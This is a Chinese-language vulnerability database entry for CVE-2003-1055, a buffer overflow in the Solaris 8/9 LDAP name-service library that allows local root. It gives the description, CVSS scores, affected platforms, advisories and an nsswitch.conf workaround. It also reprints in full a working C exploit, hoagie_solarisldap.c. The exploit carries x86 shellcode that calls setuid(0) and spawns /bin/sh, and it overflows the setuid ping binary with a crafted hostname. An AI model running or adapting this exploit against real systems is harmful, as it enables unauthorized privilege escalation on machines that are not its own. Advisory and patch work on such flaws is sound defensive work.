CVE-2003-1055
CVSS7.2
发布时间 :2003-07-03 00:00:00
修订时间 :2008-09-05 16:35:55
NMCOE    

[原文]Buffer overflow in the nss_ldap.so.1 library for Sun Solaris 8 and 9 may allow local users to gain root access via a long hostname in an LDAP lookup.


[CNNVD]Sun SUNWlldap库主机名远程缓冲区溢出漏洞(CNNVD-200307-016)

        
        Sun Solaris 是一款由Sun Microsystems公司开发的Unix操作系统。
        Sun Solaris 8/9 SUNWlldap库在处理主机名时缺少正确边界缓冲区检查,本地或者远程攻击者利用这个漏洞进行缓冲区溢出攻击,可能以目标进程权限在系统上执行任意指令。
        当应用程序连接到有此漏洞的LDAP库时,由于在解析超长主机名时存在问题,通过提供超长恶意主机名给受此漏洞影响的应用程序,可覆盖内存中的敏感地址,精心构建主机名数据可能以目标进程权限在系统上执行任意指令。
        根据报告'SUNWlldap 11.8.0'之前版本也受此漏洞影响。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:9.0::sparc
cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:9.0::x86
cpe:/o:sun:solaris:8.0::x86

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1055
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1055
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200307-016
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/11641
(VENDOR_ADVISORY)  XF  solaris-nssldapso1-bo(11641)
http://www.securityfocus.com/bid/7064
(VENDOR_ADVISORY)  BID  7064
http://www.ciac.org/ciac/bulletins/n-113.shtml
(VENDOR_ADVISORY)  CIAC  N-113
http://sunsolve.sun.com/search/document.do?assetkey=1-26-52222-1
(VENDOR_ADVISORY)  SUNALERT  52222
http://www.auscert.org.au/render.html?it=3224
(VENDOR_ADVISORY)  AUSCERT  ESB-2003.0461
http://www.securitytracker.com/id?1006401
(UNKNOWN)  SECTRACK  1006401

- 漏洞信息

Sun SUNWlldap库主机名远程缓冲区溢出漏洞
高危 边界条件错误
2003-07-03 00:00:00 2005-10-20 00:00:00
远程※本地  
        
        Sun Solaris 是一款由Sun Microsystems公司开发的Unix操作系统。
        Sun Solaris 8/9 SUNWlldap库在处理主机名时缺少正确边界缓冲区检查,本地或者远程攻击者利用这个漏洞进行缓冲区溢出攻击,可能以目标进程权限在系统上执行任意指令。
        当应用程序连接到有此漏洞的LDAP库时,由于在解析超长主机名时存在问题,通过提供超长恶意主机名给受此漏洞影响的应用程序,可覆盖内存中的敏感地址,精心构建主机名数据可能以目标进程权限在系统上执行任意指令。
        根据报告'SUNWlldap 11.8.0'之前版本也受此漏洞影响。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        
        编辑"/etc/nsswitch.conf"文件, 在下列数据库中取消LDAP (例如从下列数据库表项中删除"ldap"关键字):
         * bootparams
         * ethers
         * hosts
         * ipnodes
         * netgroup
         * netmasks
         * networks
        例如将"/etc/nsswitch.conf"中的下列行:
         hosts: ldap dns [NOTFOUND=return] files
        该成:
         hosts: dns [NOTFOUND=return] files
        厂商补丁:
        Sun
        ---
        Sun已经为此发布了一个安全公告(Sun-Alert-52222):
        Sun-Alert-52222:In Solaris 8 and Solaris 9 a Buffer Overflow in the LDAP Name Service May Lead to Unauthorized Root Access
        链接:
        http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F52222

- 漏洞信息 (4)

Sun SUNWlldap Library Hostname Buffer Overflow Exploit (EDBID:4)
solaris local
2003-04-01 Verified
0 andi
N/A [点击下载]
/***********************************************************
* hoagie_solarisldap.c
*
* gcc hoagie_solarisldap.c -o hoagie_solarisldap
*
* Author: Andi <andi@void.at>
*
* Greetz to Greuff, philipp and the other hoagie-fellas :-)
*
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
* CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
* DAMAGE DONE USING THIS PROGRAM.
*
*
* Offsets: 9208 ... without patch 108994-11
*
************************************************************/

#include <stdio.h>

#define NOP 0x90
#define ORIGSIZE 258

char shellcode[]=
/* main: */
"\xeb\x0a" /* jmp initcall */

/* initlcall: */
"\x9a\x01\x02\x03\x5c\x07\x04" /* lcall */
"\xc3" /* ret */

/* jmpz: */
"\xeb\x05" /* jmp setuidcode */

/* initcall: */
"\xe8\xf9\xff\xff\xff" /* call jmpz */

/* setuidcode: */
"\x5e" /* popl %esi */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\xf7" /* movb %al, 0xfffffff7(%esi) */
"\x89\x46\xf2" /* movl %eax, 0xfffffff2(%esi) */

/* seteuid(0); */
"\x50" /* pushl %eax */
"\xb0\x8d" /* movb $0x8d, %al */
"\xe8\xe0\xff\xff\xff" /* call initlcall */
/* setuid(0); */
"\x29\xc0" /* subl %eax, %eax */
"\x50" /* pushl %eax */
"\xb0\x17" /* movb $0x17, %al */
"\xe8\xd6\xff\xff\xff" /* call initlcall */

"\xeb\x1f" /* jmp callz */

/* start: */
/* execve /bin/sh */
"\x5e" /* popl %esi */
"\x8d\x1e" /* leal (%esi), %ebx */
"\x89\x5e\x0b" /* movl %ebx, 0x0b(%esi) */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\x19" /* movb %al, 0x19(%esi) */
"\x89\x46\x14" /* movl %eax, 0x14(%esi) */
"\x89\x46\x0f" /* movl %eax, 0x0f(%esi) */
"\x89\x46\x07" /* movl %eax, 0x07(%esi) */
"\xb0\x3b" /* movb $0x3b, %al */
"\x8d\x4e\x0b" /* leal 0x0b(%esi), %ecx */
"\x51" /* pushl %ecx */
"\x51" /* pushl %ecx */
"\x53" /* pushl %ebx */
"\x50" /* pushl %eax */
"\xeb\x18" /* jmp lcall */

/* callz: */
"\xe8\xdc\xff\xff\xff" /* call start */

"\x2f\x62\x69\x6e\x2f\x73\x68" /* /bin/sh */
"\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03"

/* lcall: */
"\x9a\x04\x04\x04\x04\x07\x04"; /* lcall */



unsigned long getsp(void)
{
__asm__(" movl %esp,%eax ");
}

int main(int argc, char **argv) {
char buf[512];
int offset = 9208;
int retaddr = 0;
int i;

if (argc > 1) {
sscanf(argv[1], "%d", &offset);
}

printf("hoagie_solarisldap local root exploit\n");
printf("[*] offset: 0x%x\n", offset);

memset(buf, NOP, sizeof(buf));
buf[28] = 0xeb;
buf[29] = 30;
for (i = 0; i < strlen(shellcode); i++) {
buf[i + 60] = shellcode[i];
}

retaddr = getsp() - offset;
printf("[*] return address: 0x%x\n", retaddr);

for (i = 0; i < 4 * 25; i += 4){
buf[i + ORIGSIZE + 2] = retaddr & 0xff;
buf[i + ORIGSIZE + 3] = (retaddr >> 8 ) &0xff;
buf[i + ORIGSIZE + 0] = (retaddr >> 16 ) &0xff;
buf[i + ORIGSIZE + 1] = (retaddr >> 24 ) &0xff;
}

execl("/usr/sbin/ping", "ping", buf, NULL);
}


// milw0rm.com [2003-04-01]
		

- 漏洞信息

15148
Solaris nss_ldap.so.1 Library LDAP Lookup Long Hostname Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-03-26 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站